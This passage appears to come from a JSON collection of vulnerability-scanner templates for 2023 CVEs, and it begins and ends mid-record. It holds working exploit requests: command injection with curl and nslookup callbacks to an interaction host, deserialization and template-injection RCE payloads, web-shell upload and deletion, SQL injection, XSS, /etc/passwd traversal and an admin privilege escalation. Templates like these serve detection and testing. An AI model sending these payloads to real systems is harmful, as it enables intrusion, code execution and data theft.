Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-44352","info":{"name":"Adobe Coldfusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/{{string}}\"><img src=a onerror=alert(document.domain)>","\"{{string}}\"><script>alert(document.domain)</script>"],"condition":"or"},{"type":"dsl","dsl":["contains(body, 'ColdFusion')","contains(header, 'text/html')"],"condition":"and"}]}]},{"id":"CVE-2023-35813","info":{"name":"Sitecore - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{{url_encode(payload)}}\")\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, '{{string}}')","contains_all(body, 'commands', 'command', 'value')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0900","info":{"name":"AP Pricing Tables Lite <= 1.1.6 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ap-pricing-tables-lite&message=1 HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded\n\naction=backend_ajax&_action=copy_table&table_id=1+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce={{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_3>=5","status_code_3 == 200","contains(body_3, \"Security check\")","contains(body_2, \"ap-pricing-tables-lite\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["_wpnonce=([0-9a-z]+)\">Log Out"],"internal":true}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6786","info":{"name":"Payment Gateway for Telcell < 2.0.4 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1880","info":{"name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"phpmyfaq\") && contains(body, \"<script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-4450","info":{"name":"JeecgBoot JimuReport - Template injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"sql\": \"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"curl http://{{interactsh-url}}\\\")} \",\n  \"type\": \"0\"\n}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")","status_code == 200","contains(content_type,\"application/json\")","contains(body,\"success\")"],"condition":"and"}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-6020","info":{"name":"Ray Static File - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","aiohttp"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3843","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.domain)>w71ch\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-33831","info":{"name":"FUXA - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/runscript HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"headers\": {\"normalizedNames\": {}, \"lazyUpdate\": \"null\"}, \"params\": {\"script\": {\"parameters\": [{\"name\": \"ok\", \"type\": \"tagid\", \"value\": \"\"}], \"mode\": \"\", \"id\": \"\", \"test\": \"true\", \"name\": \"ok\", \"outputId\": \"\", \"code\": \"require('child_process').exec('id > ./_images/{{filename}}')\"}}}\n","GET /_images/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Script OK:"]},{"type":"word","part":"body_2","words":["uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6505","info":{"name":"Prime Mover < 1.9.3 - Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp-content/uploads/prime-mover-export-files/1",".wprime"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-30868","info":{"name":"Tree Page View Plugin < 1.6.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\") && contains(body_2, \"CMS Tree Page View\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43187","info":{"name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains(to_lower(body), \"nodebb\")"]}]},{"method":"POST","path":["{{BaseURL}}/xmlrpc.php"],"headers":{"Content-Type":"text/xml"},"body":"<?xml version=\"1.0\"?>\n<methodCall>\n  <methodName>system.listMethods</methodName>\n  <params>\n    <param>\n      <value><?php phpinfo(); ?></value>\n    </param>\n  </params>\n</methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>phpinfo()</title>","PHP Version"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46818","info":{"name":"ISPConfig - PHP Code Injection","severity":"high"},"requests":[{"raw":["POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&s_mod=login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"Set-Cookie\")","status_code == 302"],"condition":"and"}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(response, \"_csrf_id\", \"_csrf_key\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"lang_file_location","group":1,"regex":["<legend>Language file: (.*)</legend>"],"internal":true},{"type":"regex","name":"csrf_id","group":1,"regex":["_csrf_id\" value=\"(.*)\" />"],"internal":true},{"type":"regex","name":"csrf_key","group":1,"regex":["_csrf_key\" value=\"(.*)\" />"],"internal":true}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('\u00a7echo-cmd\u00a7')}}\n"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["{{echo-cmd-hash}}"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7lang_file_location\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7websh-file\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41621","info":{"name":"Emlog Pro v2.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["onmouseover='alert(document.domain)'bad=","emlog"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45852","info":{"name":"Viessmann Vitogate 300 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"application/json\")","contains_all(body, \"traceroute: {{randstr}}: Unknown host\", \"daemon:x:1:1:\")"],"condition":"and"}]}]},{"id":"CVE-2023-5003","info":{"name":"Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/ldap-authentication-report.csv"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID","USERNAME","TIME","LDAP STATUS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22621","info":{"name":"Strapi Versions <=4.5.5 - SSTI to Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{email}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"token\",\"isActive\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"token","json":[".data.token"],"internal":true}]},{"raw":["PUT /users-permissions/advanced HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"unique_email\":true,\"allow_register\":true,\"email_confirmation\":true,\"email_reset_password\":null,\"email_confirmation_redirection\":\"{{RootURL}}\",\"default_role\":\"authenticated\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /users-permissions/email-templates HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\n  \"email-templates\": {\n    \"reset_password\": {\n      \"display\": \"Email.template.reset_password\",\n      \"icon\": \"sync\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Reset password\",\n        \"message\": \"<p>We heard that you lost your password. Sorry about that!</p>\\n\\n<p>But dont worry! You can use the following link to reset your password:</p>\\n<p><%= URL %>?code=<%= TOKEN %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    },\n    \"email_confirmation\": {\n      \"display\": \"Email.template.email_confirmation\",\n      \"icon\": \"check-square\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Account confirmation\",\n        \"message\": \"<%= `${ process.binding('spawn_sync').spawn({\\\"file\\\":\\\"/bin/sh\\\",\\\"args\\\":[\\\"/bin/sh\\\",\\\"-c\\\",\\\"curl {{interactsh-url}}\\\"],\\\"stdio\\\":[{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"},{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"/*<>%=*/}]}).output }` %>\\n\\n<p><%= URL %>?confirmation=<%= CODE %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    }\n  }\n}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["POST /api/auth/local/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"email\": \"{{address}}\",\n    \"username\": \"{{randstr_1}}\",\n    \"password\": \"{{randstr_2}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["ApplicationError"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27034","info":{"name":"Jms Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(tolower(body), \"jmsblog\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6"]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-26035","info":{"name":"ZoneMinder Snapshots - Command Injection","severity":"critical"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrfMagicToken = \\\"(key:[a-f0-9]{40},\\d+)"],"internal":true}]},{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nview=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]}]}]},{"id":"CVE-2023-48084","info":{"name":"Nagios XI < 5.11.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","@timeout: 15s\nGET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_3>=5","contains(body_3, \"Home Dashboard</a>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true}]}]},{"id":"CVE-2023-3847","info":{"name":"MooDating 1.2 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\",\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34993","info":{"name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34259","info":{"name":"Kyocera TASKalfa printer - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"server","words":["KM-MFP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30534","info":{"name":"Cacti < 1.2.25 Insecure Deserialization","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}\n","POST /managers.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 